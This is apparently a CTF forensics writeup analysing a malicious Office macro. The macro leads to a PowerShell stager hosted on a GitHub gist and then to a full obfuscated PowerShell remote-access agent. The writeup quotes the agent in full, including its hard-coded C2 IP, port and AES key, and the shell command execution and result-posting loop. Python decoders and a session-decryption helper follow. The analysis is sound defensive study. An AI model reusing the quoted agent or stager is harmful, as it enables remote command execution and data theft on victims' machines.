¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼.Close End If ²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥.Open (³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬) Else MsgBox ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨("åxi'³P³²ÛP³xP²¿iPQEPk²x") End If End Sub
```

This reveals a strange macro. olevba's explanation of the keywords it flagged is here:

```
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AutoOpen            |Runs when the Word document is opened        |
|AutoExec  |DocumentOpen        |Runs when the Word document is opened        |
|AutoExec  |Document_Open       |Runs when the Word or Publisher document is  |
|          |                    |opened                                       |
|AutoExec  |Auto_Open           |Runs when the Excel Workbook is opened       |
|AutoExec  |Workbook_Open       |Runs when the Excel Workbook is opened       |
|Suspicious|Open                |May open a file                              |
|Suspicious|Write               |May write to a file (if combined with Open)  |
|Suspicious|adodb.stream        |May create a text file                       |
|Suspicious|SaveToFile          |May create a text file                       |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|WScript.Shell       |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|Shell.Application   |May run an application (if combined with     |
|          |                    |CreateObject)                                |
|Suspicious|microsoft.xmlhttp   |May download files from the Internet         |
|Suspicious|Chr                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+
```

There is one function, and the Sub after it uses this function, so I proceed to untangle it.

```python
def func(param):
    # The two alphabets from the macro: each character of `a` maps to the character
    # at the same position in `var1` (the VBA does this with InStr and Mid)
    a = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥"
    var1 = "ãXL1lYU~Ùä,Ca²ZfÃ@dO-cq³áÕsÄJV9AQnvbj0Å7WI!RBg§Ho?K_F3.Óp¥ÖePâzk¶ÛNØ%G mÜ^M&+¡#4)uÀrt8(ÒSw|T*Â$EåyhiÚx65Dà¿2ÁÔ"
    var4 = ""
    for char in param:
        var2 = a.find(char)
        if var2 > -1:
            var3 = var1[var2]
            var4 += var3
        else:
            # characters outside the alphabet pass through unchanged
            var4 += char
    return var4
```

```python
argument0 = "4BEiàiuP3x6¿QEi³"
argument1 = "$x¿PÜ_jEPkEEiPÜ_6IE3P_i3PÛx¿²PàQBx²³_i³P3x6¿QEi³bPÜ_jEPkEEiPb³x#Eir\" & vbCrLf & \"ÒxP²E³²àEjEP³ÜEbEP3_³_(PÛx¿P_²EP²E7¿à²E3P³xP³²_ib0E²P@mmIP³xP³ÜEP0x##xÄàiuPk_iIP_66x¿i³Pi¿QkE²:P\" & vbCrLf & \"@m@m@mo@@§mmm\" & vbCrLf & \"g66x¿i³PÜx#3E²:PLu¿ÛEiPÒÜ_iÜP!xiu\" & vbCrLf & \"t_iI:PTtPt_iI"
argument2 = "pEP3EEB#ÛP²Eu²E³P³xPài0x²QPÛx¿"
argument3 = r"\k¿i6Ü_~Bb@"
argument4 = "ܳ³Bb://uàb³~uà³Ü¿k¿bE²6xi³Ei³~6xQ/k7¿_iQ_i/fÀ3_o-3Yf0_E6m6kk3_km§3Y03ÀY_3__/²_Ä/À3EÀkfmfÀ@Eããoãä§k@_@ã0ä6_E3-ãY036-@@koo/_Àmb6m@§~Bb@"
argument5 = "åxi'³P³²ÛP³xP²¿iPQEPk²x"

# Every string literal the macro passes to the decoding function
res = []
res.append(func(argument0))
res.append(func(argument1))
res.append(func(argument2))
res.append(func(argument3))
res.append(func(argument4))
res.append(func(argument5))
for i in res:
    print(i)
```

Putting the two together and running it gives:

![Untitled 20](img/Untitled%2020.png)

link: [https://gist.githubusercontent.com/bquanman/98da73d49faec0cbbdab02d4fd84adaa/raw/8de8b90981e667652b1a16f5caed364fdc311b77/a80sc012.ps1](https://gist.githubusercontent.com/bquanman/98da73d49faec0cbbdab02d4fd84adaa/raw/8de8b90981e667652b1a16f5caed364fdc311b77/a80sc012.ps1)

```powershell
.
((VaRIablE '*MdR*').NAmE[3,11,2]-JOIn'') (nEW-OBJeCT IO.cOmPrEsSion.DeflAteSTREam( [sYStEm.IO.MeMOrYSTreAM][CoNVeRt]::frOMBase64sTriNG('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' ) , [iO.COmpreSSIOn.cOMPrEssionmode]::decOMpReSS )|% {nEW-OBJeCT Io.StREamreadEr($_,[TEXt.enCoDInG]::AsciI )} ).reAdToENd()
```

When I downloaded the file, my machine reported that it contained a virus 🥲, so I copied it and used CyberChef to decode the base64 and decompress it.

```powershell ${8r`T3WA} = [tyPe]("{1}{8}{4}{6}{5}{9}{2}{3}{0}{7}"-F 'd',("{0}{1}"-f 'syS','TEm'),("{1}{0}"-f'ERM','h'),'O',("{0}{1}"-f 'eCUrI','tY'),("{0}{1}" -f 'h','Y.Ci'),("{0}{1}{2}" -f '.cry','P','TOGRap'),'e','.s','p') ;.('SV') ("{0}{1}"-f '72','j5O') ( [TYpe]("{9}{1}{4}{0}{8}{10}{6}{12}{7}{11}{3}{2}{5}" -F 'TY',("{1}{2}{0}" -f 'eC','Yst','em.s'),'Od','m','uri','e','p','Di',("{0}{1}" -f'.','cRY'),'s',("{2}{1}{0}"-f 'Y.','toGRapH','p'),'ng','aD') ) ; ${X`NfD}=[tyPe]("{2}{0}{1}{3}"-f 'te',("{0}{1}"-f'm','.cONV'),'Sys','ErT') ; ${H`LvW1} = [tYPe]("{2}{4}{3}{5}{1}{0}" -f 'iNG',("{0}{2}{1}" -f 't','Od','.EnC'),'S',("{1}{2}{0}"-f '.t','S','tEM'),'Y','EX'); .("{0}{2}{1}" -f'SeT','m',("{0}{1}"-f'-iT','e')) (("{0}{1}"-f 'vA','RI')+("{0}{1}" -f 'a','bLE')+("{1}{0}" -f'y7',':92')) ( [Type]("{1}{2}{0}" -F ("{1}{0}{2}"-f 'NEt.dn','eM.','S'),'Sys','t')) ; ${U`JX`Rc}=[tyPE]("{1}{2}{0}" -F 'nG','Str','i') ;function Cr`EATe-`AeS`manA`GeDo`B`Je`Ct(${vx`ZT`mff}, ${5`T`MRWpLUy}) { ${AJuJ`V`RAZ`99} = .("{1}{2}{3}{0}"-f 't',("{0}{1}" -f'Ne','w-'),("{1}{0}" -f 'e','Obj'),'c') ("{7}{9}{8}{0}{10}{2}{6}{5}{3}{11}{1}{4}"-f 'ty','nag',("{0}{2}{1}" -f 'Cry','o','pt'),'y','ed','ph','gra',("{0}{1}"-f'Sy','stem.'),("{0}{1}"-f 'ecur','i'),'S','.',("{0}{2}{1}" -f'.','sMa','Ae')) ${AJUjvr`AZ`99}."Mo`de" = ( .("{1}{2}{0}" -f 'lE',("{1}{0}" -f't-vA','gE'),("{1}{0}" -f'Ab','RI')) ("8rt"+"3Wa") -Value )::"c`Bc" ${aJuj`V`RAZ99}."PA`d`dInG" = ( .("{0}{1}"-f 'Di','r') ("{2}{3}{0}{1}"-f'le:72j5','o','v','ARIab') )."VA`LUe"::"ze`Ros" ${A`JUJvr`Az`99}."Bl`O`ckSizE" = 128 
${Aju`Jv`RAz`99}."keysI`ze" = 256 if (${5`TM`RWPluy}) { if (${5`TmR`WpLuy}.("{0}{1}{2}" -f ("{1}{0}"-f 'tT','ge'),'y','pe')."iNV`O`ke"()."n`AME" -eq ("{0}{2}{1}" -f 'St','g','rin')) { ${a`j`U`jvRaZ99}."Iv" = (&("{1}{0}"-f'r','di') ("{0}{1}{2}{3}" -f 'va','RI','aB','le:xNFd'))."vAl`Ue"::("{1}{2}{3}{0}"-f 'ing','Fro',("{1}{0}{2}" -f'se','mBa','64'),'Str')."In`VOKe"(${5TMRW`Pl`Uy}) } else { ${ajUj`VraZ`99}."I`V" = ${5tmRw`PL`Uy} } } if (${Vx`ZtM`FF}) { if (${VXz`T`mfF}.("{1}{2}{0}" -f ("{1}{0}"-f'e','Typ'),'g','et')."I`NvoKe"()."n`AME" -eq ("{1}{0}" -f 'ing','Str')) { ${ajU`j`VraZ99}."K`ey" = ( &('LS') (("{0}{1}"-f'V','ariAb')+'l'+("{0}{1}" -f 'e:XN','F')+'D') )."vA`luE"::("{1}{0}{2}{3}"-f'e',("{1}{0}" -f'as','FromB'),'64S',("{1}{0}" -f 'ng','tri'))."invO`Ke"(${vx`z`TmFF}) } else { ${AjU`J`Vr`AZ99}."k`ey" = ${v`Xz`Tmff} } } ${aJUjvRA`Z`99} } function e`N`CRYpT(${VxzT`M`Ff}, ${RO`FPdq`R`F99}) { ${B`y`TES} = ( .("{1}{0}"-f ("{1}{2}{0}"-f 'e','arI','abl'),'v') (("{1}{0}" -f'lvW','h')+'1') )."vAL`UE"::"u`Tf8".("{2}{0}{1}" -f 'yt','es',("{0}{1}" -f 'G','etB'))."INV`o`kE"(${r`O`FpdQRF99}) ${ajujVR`AZ`99} = .("{4}{0}{2}{5}{3}{1}"-f("{1}{0}" -f'-','eate'),'ct','Ae',("{1}{0}" -f'e','edObj'),'Cr',("{1}{0}{2}"-f 'Ma','s','nag')) ${VX`ZtM`Ff} ${qD`IqL`GaQ99} = ${aJuj`VR`AZ99}.("{1}{2}{0}" -f'or',("{0}{1}{2}" -f'Create','En','c'),("{1}{0}" -f 't','ryp'))."in`VoKe"() ${lw`i`hYmIF99} = ${Qd`i`qLgaq99}.("{3}{4}{1}{0}{2}"-f ("{0}{1}{2}"-f 'nal','Bl','o'),("{1}{0}" -f'mFi','for'),'ck','Tra','ns')."i`NvO`Ke"(${b`yTeS}, 0, ${b`y`Tes}."Le`NgTh"); [byte[]] ${f`J`AxUWQ`N99} = ${A`Ju`jvR`Az99}."Iv" + ${lW`iHYmiF`99} ${aj`UJ`V`RAZ99}.("{1}{2}{0}"-f 'e','Dis','pos')."i`NVO`KE"() ${x`NFd}::"tOBase6`4`S`TRi`NG"."i`Nvoke"(${Fj`A`X`UWqN99}) } function deC`Ry`PT(${VXzt`m`FF}, ${b`KJrxQ`Cf`99}) { ${bYT`Es} = (&("{0}{2}{1}" -f'v',("{0}{1}" -f 'i','able'),'AR') ('xnf'+'d') )."Va`luE"::("{3}{1}{2}{0}" -f ("{0}{1}" -f'r','ing'),'o',("{2}{0}{1}"-f'e6','4St','mBas'),'Fr')."InV`OKE"(${Bk`jRx`qcF99}) 
${5t`MR`WpLuY} = ${B`Y`Tes}[0..15] ${aJu`JVra`z99} = .("{0}{2}{4}{3}{1}" -f ("{1}{0}"-f'rea','C'),("{1}{0}"-f 'ect','j'),("{0}{1}" -f't','e-Aes'),'dOb',("{0}{1}{2}"-f'Mana','g','e')) ${VxZTm`FF} ${5TMRw`p`LUY} ${MNDm`WYnB`99} = ${AJ`Ujv`RA`z99}.("{4}{0}{2}{1}{3}" -f'ea','ry',("{0}{1}"-f'te','Dec'),("{0}{1}"-f'p','tor'),'Cr')."In`Voke"(); ${A`htL`MYh`l99} = ${M`ND`mWynB99}.("{0}{3}{1}{4}{5}{2}"-f 'T',("{0}{1}"-f 'fo','rmFi'),("{1}{0}"-f'lock','B'),("{1}{0}" -f's','ran'),'na','l')."i`Nvo`kE"(${b`Y`TES}, 16, ${b`yTeS}."lENg`TH" - 16); ${A`J`UjVRAZ99}.("{1}{0}"-f 'se',("{1}{0}" -f 'spo','Di'))."IN`VO`KE"() ${HLV`W1}::"uT`F8"."G`E`TStri`Ng"(${AhtL`m`Y`hl99})."T`RIM"([char]0) } function Sh`ELL(${DfJz`1co}, ${y`o`8xm5}){ ${Cw`zVY`VJ} = &("{1}{2}{0}" -f 'ct','Ne',("{0}{1}"-f 'w-O','bje')) ("{4}{3}{5}{0}{1}{2}"-f ("{5}{2}{0}{3}{4}{1}"-f'P','I','cs.','roc','essStart','i'),'n','fo',("{0}{1}"-f'ys','te'),'S',("{0}{2}{1}"-f'm.Di','st','agno')) ${Cw`ZVy`Vj}."FIlena`me" = ${DFjZ1`co} ${C`W`zvYvj}."r`eDIRec`TsT`AnDaRdERr`OR" = ${T`Rue} ${cwZ`V`YVJ}."ReDIRE`cT`s`TANdar`DoUTPUT" = ${tR`Ue} ${C`WZv`yVJ}."USEs`hELl`eXeC`U`Te" = ${F`ALsE} ${c`wzvy`VJ}."aRg`UmENtS" = ${yO8`x`m5} ${p} = .("{0}{2}{1}" -f'New',("{1}{0}"-f 'ject','Ob'),'-') ("{6}{0}{4}{3}{1}{2}{5}" -f("{1}{2}{0}" -f 'Dia','yst','em.'),("{1}{2}{0}"-f 'P','o','stics.'),'ro','n','g',("{0}{1}" -f 'ces','s'),'S') ${P}."s`T`ArTiN`FO" = ${C`W`zvYVj} ${p}.("{1}{0}" -f("{1}{0}"-f'art','t'),'S')."INvo`KE"() | &("{2}{1}{0}"-f'l',("{1}{0}" -f'Nul','t-'),'Ou') ${P}.("{2}{1}{0}{3}"-f'Exi',("{0}{1}"-f 'tF','or'),'Wai','t')."inv`oKE"() ${BHnxN`Ur`W99} = ${p}."sta`Ndar`dOu`TpUT".("{2}{0}{1}" -f("{1}{0}" -f 'En','To'),'d',("{0}{1}" -f 'R','ead'))."I`NV`OkE"() ${NmWkj`O`A`B99} = ${p}."St`A`N`dArde`RrOR".("{2}{1}{3}{0}"-f'nd','To',("{1}{0}" -f'd','Rea'),'E')."Inv`o`ke"() ${k`C`NjcQdL} = ('VAL'+'ID '+"$BhnXnUrW99`n$nmWKJOAb99") ${K`cnJcQ`Dl} } ${FZvyCr} = ("{0}{2}{3}{1}" -f '12',("{0}{1}{2}"-f '.2','07',("{1}{0}" 
-f'20','.2')),'8',("{1}{0}"-f'9','.19')) ${t`wFTrI} = ("{0}{1}"-f'7','331') ${VxzTmff} = ("{2}{1}{4}{6}{3}{0}{7}{5}"-f 'XI',("{0}{1}{2}" -f 'w',("{0}{1}" -f 'jM7','m2'),'c'),("{0}{1}" -f 'd','/3K'),'u','GAt','+M=',("{0}{1}{2}" -f'L','I',("{1}{0}"-f("{1}{0}"-f'lhD','7K'),'6')),("{0}{2}{3}{1}"-f("{2}{1}{0}"-f 'KST','XR','/'),'R',("{0}{1}"-f'k',("{1}{0}"-f'lmJ','O')),("{0}{1}"-f 'XE','42'))) ${n} = 3 ${C`w`j2TWh} = "" ${yC`RU`Tw} = ${9`2Y7}::("{2}{0}{1}"-f("{1}{0}{2}"-f't','etHos','N'),'ame','G')."in`VoKE"() ${F`N`FFGXDzj} = "p" ${D`FctD`FM} = (("{0}{1}" -f'ht','tp') + ':' + "//$FZVYCR" + ':' + "$TwFTRi/reg") ${kV`QBXbuR} = @{ ("{0}{1}"-f 'n','ame') = "$YCRUTw" ("{1}{0}"-f 'pe','ty') = "$fNFFGXDZJ" } ${CWj2`TWh} = (&("{4}{3}{2}{0}{1}"-f '-',("{1}{2}{0}"-f't','W','ebReques'),'ke','nvo','I') -UseBasicParsing -Uri ${d`Fct`DFM} -Body ${k`V`qBxbUr} -Method ("{1}{0}"-f'OST','P'))."co`N`TENT" ${TvYM`e`YrR99} = (("{0}{1}"-f'htt','p') + ':' + "//$FZVYCR" + ':' + "$TwFTRi/results/$cWJ2Twh") ${i`JfySE2} = (("{1}{0}" -f 'p','htt') + ':' + "//$FZVYCR" + ':' + "$TwFTRi/tasks/$cWJ2Twh") for (;;){ ${M`A04XM`gY} = (.("{2}{0}{3}{1}{4}" -f'n',("{0}{1}"-f'q','ues'),'I',("{0}{1}{2}" -f 'voke-W','e','bRe'),'t') -UseBasicParsing -Uri ${I`J`FYSE2} -Method 'GET')."cO`N`TeNt" if (-Not ${UJX`Rc}::("{1}{0}{3}{2}"-f 'l',("{0}{1}"-f'IsN','ul'),("{1}{0}{2}" -f 'mpt','rE','y'),'O')."INvO`Ke"(${M`A04XmGy})){ ${m`A04XM`gY} = .("{0}{1}" -f("{1}{0}" -f 'r','Dec'),'ypt') ${V`XZ`Tmff} ${Ma04X`MgY} ${mA0`4X`MgY} = ${ma0`4`XMgy}.("{1}{0}"-f'it','spl')."INv`okE"() ${FL`AG} = ${MA04`x`mgY}[0] if (${Fl`Ag} -eq ("{0}{1}" -f 'VAL','ID')){ ${WB1`SWYo`je} = ${MA04`X`MgY}[1] ${yO8`X`M5S} = ${Ma0`4XMgY}[2..${MA04x`mgY}."LeNg`TH"] if (${wb1s`Wyo`Je} -eq ("{1}{0}"-f'l',("{1}{0}" -f'hel','s'))){ ${F} = ("{0}{1}{2}"-f 'c',("{1}{0}" -f'e','md.'),'xe') ${y`O`8XM5} = "/c " foreach (${a} in ${yo8`xM`5s}){ ${Yo8`x`m5} += ${a} + " " } ${KcNJ`C`QdL} = .("{0}{1}"-f 'sh','ell') ${f} ${yo`8xM5} ${kCnjCQ`DL} = .("{1}{2}{0}"-f 
'pt','Enc','ry') ${VxztM`FF} ${kc`Nj`cqdl} ${kvqbX`B`Ur} = @{("{1}{0}" -f 'lt',("{0}{1}" -f 'r','esu')) = "$KcnJCQDl"} &("{3}{0}{1}{4}{2}" -f'ke','-W',("{0}{1}" -f 'qu','est'),("{0}{1}"-f'I','nvo'),("{1}{0}" -f 'bRe','e')) -UseBasicParsing -Uri ${tV`yM`Ey`RR99} -Body ${k`V`QbXbur} -Method ("{1}{0}" -f 'T','POS') } elseif (${Wb1Sw`Y`OJe} -eq ("{1}{0}{2}"-f 'owe','p',("{2}{1}{0}" -f 'l','l','rshe'))){ ${f} = ("{0}{3}{4}{1}{2}" -f ("{0}{1}"-f'p','owers'),'e','xe','he','ll.') ${yO`8X`m5} = "/c " foreach (${a} in ${Y`o8xM5s}){ ${YO8x`m5} += ${a} + " " } ${kc`Nj`cqdL} = &("{0}{1}" -f 'she','ll') ${F} ${yO`8`XM5} ${k`cn`jCQDL} = .("{0}{1}"-f ("{0}{1}" -f 'En','cr'),'ypt') ${vXZT`mfF} ${KCN`jcqDl} ${KVqb`x`BUr} = @{("{1}{0}"-f ("{0}{1}" -f 'es','ult'),'r') = "$KcnJCQDl"} &("{0}{2}{4}{5}{1}{3}"-f'Inv',("{0}{1}"-f 'WebR','e'),'o',("{1}{0}" -f 'st','que'),'ke','-') -UseBasicParsing -Uri ${tvyMEY`R`R99} -Body ${k`V`qBXb`Ur} -Method ("{1}{0}" -f 'OST','P') } elseif (${wb`1swYO`Je} -eq ("{0}{1}"-f 'sl','eep')){ ${n} = [int]${yO`8Xm`5S}[0] ${kV`Q`BXbur} = @{("{0}{1}"-f're',("{0}{1}"-f 'su','lt')) = ""} &("{2}{0}{4}{1}{3}" -f 'o',("{1}{0}"-f 'Re','Web'),'Inv',("{0}{1}"-f'qu','est'),'ke-') -UseBasicParsing -Uri ${tV`Ymeyr`R`99} -Body ${Kv`QBXBur} -Method ("{1}{0}" -f 'T','POS') } elseif (${wb`1sWy`ojE} -eq ("{1}{0}"-f'e',("{1}{0}"-f'm','rena'))){ ${c`wJ2t`Wh} = ${Y`O8Xm`5S}[0] ${TVY`mey`Rr99} = (("{1}{0}" -f'tp','ht') + ':' + "//$FZVYCR" + ':' + "$TwFTRi/results/$cWJ2Twh") ${ijF`Ys`E2} = (("{1}{0}"-f'ttp','h') + ':' + "//$FZVYCR" + ':' + "$TwFTRi/tasks/$cWJ2Twh") ${kV`Qb`XbUr} = @{("{1}{0}" -f'lt',("{1}{0}" -f 'esu','r')) = ""} .("{0}{1}{4}{2}{3}" -f 'Inv',("{0}{1}{2}" -f'ok','e-','WebR'),'qu','est','e') -UseBasicParsing -Uri ${TVY`mEyR`R`99} -Body ${KvqBxb`Ur} -Method ("{1}{0}"-f 'OST','P') } elseif (${w`B1s`WYOJe} -eq ("{0}{1}" -f 'qu','it')){ exit } } .("{1}{0}"-f 'p',("{0}{1}"-f'sl','ee')) ${N} } } ``` Mình up code đã được deobf ở đây: 
[link](https://gist.github.com/winndy112/98301e8b602a4e83b61f4b2ce059f811)

The important flow here: the agent registers with a POST to `/reg`, then fetches `$content` with an HTTP GET to the hard-coded IP and port (controlled by the attacker) at the URI `/tasks/...`, where the trailing part is the id the server handed back. Each task is base64 of `IV || ciphertext` (AES-256-CBC, zero padding) under a key that sits base64-encoded in the script; the agent decrypts it, splits it on whitespace, checks for the `VALID` marker, executes the command, then encrypts the output the same way and POSTs it to `/results/...`. The script below decrypts the tasks and the results the agent posted back after executing them.

```python
import base64
from Crypto.Cipher import AES  # pycryptodome


def Decrypt(Key, ciphertext):
    # Same wire format as the agent's Decrypt(): base64(IV || AES-CBC ciphertext)
    ciphertext_bytes = base64.b64decode(ciphertext)
    iv = ciphertext_bytes[0:16]
    ciphertext_data = ciphertext_bytes[16:]
    aes = AES.new(Key, AES.MODE_CBC, iv)
    plaintext = aes.decrypt(ciphertext_data)
    plaintext = plaintext.rstrip(b'\x00')  # PaddingMode.Zeros, same as .Trim([char]0) in the agent
    decrypted_data = plaintext.decode('utf-8')
    return decrypted_data


# Base64 blobs taken from the GET /tasks/<id> responses in the capture
tasks = ["RrzBf9o5vTBf+vInYW3OTzBvvNIWSyyKsx6v25jOD9roPGP4gOhaHPc/u7l804cs",
         "tp4pZ9OgpI9uxr4sNupHQJE5hBlTVd7NbIK21rjApBf15tj9AuNo6OU/zJ/K3REi",
         "bK2FX23ydWGbJNdJliRrDqjOE17p1YakRt2cjgaRJJv0zAVVro+Gq1waD0ui+lCe",
         "uGjyY6GcnabYem8450v+e256asufK4JUhfW5/KQfyPeAIkmBiQcwBoQbI8z7v9NLyH9Gwi4k6ViFL0nMTCGGWS0TSS6vqWRHa4ADkfcaVFhcjLmBV23dnOfSoCGUWzCg4TBcpDtc+C4QOc/v+dZSL2ytww2c8+pY1dGwth89dVWej8qifotdP0I9p3f/WNCf",
         "rQp9Lo1Cuh3mvS45DF0m5ZG1lhW4/Jb7T608IpAS5GwBurTGeJ5oomIhg1jHo1x4dLqcRnsNYqKU7cj8gGXkQA==",
         "eq/gZMmuX1cPWZYJ9iQcSi3P1KYsOFCwdkD/L8i6HSGn7yWmXk8YxGN96VndokXT"]

# The AES key, hard-coded (base64) in the obfuscated script
key = "d/3KwjM7m2cGAtLI67KlhDuXI/XRKSTkOlmJXE42R+M="
key = base64.b64decode(key)

decrypt_task = []
# The "result" form fields the agent POSTed to /results/<id>
result_post = ["aix8RxrqFg9Wi2uiE6B8BVgr5L51x55Cxxxw4zppPONqXskKoe+N7OMDg1d06pTj",
               "luFqXmiFN1kyXfGkxrD9GukoecDD5s6XLJwlHJ2T/Yu7F8NkHwvBwut0us0/rbsJabWaVH47WHTwPEdGnj2rxdsm0o7dns4ptkRQ4ckX9uxwMLKqFWygzb9oSVA7BR7ilsjkBwvvSJDmKCOcITICTg==",
               "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",
               "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",
               "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"]
result_post_decrypted = []

# zip stops at the shorter list, so only the first five tasks are paired with a result
for task, res in zip(tasks, result_post):
    decrypt_task.append(Decrypt(key, task))
    result_post_decrypted.append(Decrypt(key, res))

print(decrypt_task[-1], '\n', result_post_decrypted[-1])
```

From the output, we get the flag from the hex string.
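The three layers this writeup peels off by hand, as an added example that is not part of the original writeup or of the challenge material: a small Python module that undoes the stager (base64, then raw DEFLATE, which is what .NET `DeflateStream` produces, so `zlib` needs `wbits=-15`), re-implements the agent's `Encrypt`/`Decrypt` wire format (base64 of `IV || AES-256-CBC ciphertext` with zero padding and NUL trimming), and parses the task protocol the loop above implements (`VALID <shell|powershell|sleep|rename|quit> <args>` in, `VALID <stdout>` newline `<stderr>` out). The stager's first line spells `iex` out of `(Variable '*MdR*').Name[3,11,2]`, the characters of `MaximumDriveCount`, which is why the inflated stream is executable PowerShell. Endpoint and handler names come from the script; the function names, the fixed key and IV, and the sample session are constructed for the example, and AES comes from pycryptodome (what the writeup's own script imports) or, failing that, the `cryptography` package.

```python
"""Added example (not the writeup's code): decode a captured session of the
agent above offline. Needs pycryptodome or cryptography for AES; the stager
and protocol helpers are stdlib only."""
import base64
import itertools
import zlib

try:  # pycryptodome, the module the writeup's own script imports
    from Crypto.Cipher import AES as _PyAES

    def _aes_cbc(key, iv, data, encrypt):
        c = _PyAES.new(key, _PyAES.MODE_CBC, iv)
        return c.encrypt(data) if encrypt else c.decrypt(data)
    HAVE_AES = True
except ImportError:
    try:  # fallback: the cryptography package
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

        def _aes_cbc(key, iv, data, encrypt):
            c = Cipher(algorithms.AES(key), modes.CBC(iv))
            op = c.encryptor() if encrypt else c.decryptor()
            return op.update(data) + op.finalize()
        HAVE_AES = True
    except ImportError:
        HAVE_AES = False

        def _aes_cbc(key, iv, data, encrypt):
            raise RuntimeError("install pycryptodome or cryptography for AES")

BLOCK = 16  # AES block size; the agent sets BlockSize = 128


def unpack_stager(b64: str) -> str:
    """Undo [Convert]::FromBase64String + DeflateStream(Decompress).
    DeflateStream emits *raw* DEFLATE (no zlib header), hence wbits=-15;
    a plain zlib.decompress() fails with 'incorrect header check'."""
    return zlib.decompress(base64.b64decode(b64), -15).decode("ascii")


def pack_stager(script: str) -> str:
    """Inverse of unpack_stager; used here only to build a constructed sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = comp.compress(script.encode("ascii")) + comp.flush()
    return base64.b64encode(raw).decode()


def agent_encrypt(key: bytes, text: str, iv: bytes) -> str:
    """Encrypt() from the agent: zero-pad, AES-CBC, prepend the IV, base64."""
    data = text.encode("utf-8")
    data += b"\x00" * (-len(data) % BLOCK)  # PaddingMode.Zeros: nothing added if aligned
    return base64.b64encode(iv + _aes_cbc(key, iv, data, True)).decode()


def agent_decrypt(key: bytes, b64: str) -> str:
    """Decrypt() from the agent: IV is the first 16 bytes, then trim NULs."""
    raw = base64.b64decode(b64)
    iv, ct = raw[:BLOCK], raw[BLOCK:]
    return _aes_cbc(key, iv, ct, False).decode("utf-8").rstrip("\x00")


def parse_task(text: str):
    """Mirror the agent loop: split on whitespace, [0] must be VALID,
    [1] names the handler, [2..] are its arguments. Anything else is ignored."""
    parts = text.split()
    if not parts or parts[0] != "VALID":
        return None
    return parts[1], parts[2:]


def format_result(stdout: str, stderr: str) -> str:
    """Return value of Shell(): this is what gets encrypted and POSTed to /results/<id>."""
    return "VALID " + stdout + "\n" + stderr


def decode_session(key: bytes, task_blobs, result_blobs):
    """Pair each task with the result posted for it. zip_longest keeps a trailing
    task that has no result (a final 'quit'), which plain zip would drop; the
    sleep/rename handlers POST an empty result, which is left as None."""
    out = []
    for t, r in itertools.zip_longest(task_blobs, result_blobs):
        task = parse_task(agent_decrypt(key, t)) if t else None
        result = agent_decrypt(key, r) if r else None
        out.append((task, result))
    return out


def demo():
    """Constructed session (not from the challenge capture): fixed key and IV so the
    blobs are reproducible; the real agent lets AesManaged pick a random IV."""
    key, iv = bytes(range(32)), bytes(range(16))
    tasks = [agent_encrypt(key, t, iv)
             for t in ("VALID shell whoami", "VALID sleep 10", "VALID quit")]
    results = [agent_encrypt(key, format_result("desktop-a\\user", ""), iv),
               ""]  # the sleep handler posts result="" in the clear
    return decode_session(key, tasks, results)


if __name__ == "__main__":
    print(unpack_stager(pack_stager("Write-Host hi")))
    for task, result in demo():
        print(task, "->", repr(result))
```

Feeding the `tasks` and `result_post` lists above together with the script's base64 key into `decode_session` gives the same plaintexts as the writeup's decryptor, with the sixth task no longer dropped; `HAVE_AES` tells you at import time whether an AES backend was found.

---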